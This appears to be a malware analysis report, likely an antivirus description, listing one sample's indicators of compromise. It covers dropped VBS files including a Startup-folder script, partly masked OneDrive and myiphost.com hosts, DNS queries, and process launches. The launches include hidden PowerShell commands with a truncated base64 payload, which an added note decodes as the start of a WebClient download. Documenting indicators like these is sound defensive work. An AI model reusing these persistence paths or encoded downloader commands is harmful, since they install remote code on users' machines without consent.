Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\bbb.vbs
- %WINDIR%\serviceprofiles\localservice\appdata\roaming\microsoft\upnp device host\upnphost\udhisapi.dll
- %HOMEPATH%\music\video.mp4
- %HOMEPATH%\music\win.vbs
- 'on####ve.live.com':443
- 'yn####.#b.files.1drv.com':443
- 'up####.myiphost.com':2525
- DNS ASK on####ve.live.com
- DNS ASK yn####.#b.files.1drv.com
- DNS ASK up####.myiphost.com
- '23#.#55.255.250':1900
- 'ff#2::c':1900
- ClassName: 'WMPlayerApp' WindowName: ''
- ClassName: '\MSITPro::EventQueue' WindowName: ''
- ClassName: 'Type32_Main_Window' WindowName: ''
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Music\win.vbs"
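- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc JAB3AGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJAB3AGUAYgAuAEQAbwB3AG4AbABvAGEAZABzAHQAcgB...' (со скрытым окном; видимая часть аргумента -enc — это Base64 от текста в UTF-16LE, она декодируется в две строки: «$web = New-Object System.Net.WebClient;» и «$string = $web.Downloadstr», дальше значение обрезано)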
- '%ProgramFiles(x86)%\windows media player\wmplayer.exe' /prefetch:6 /Open "%HOMEPATH%\Music\video.mp4"
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\BBB.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc JAB3AGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJAB3AGUAYgAuAEQAbwB3AG4AbABvAGEAZABzAHQAcgB...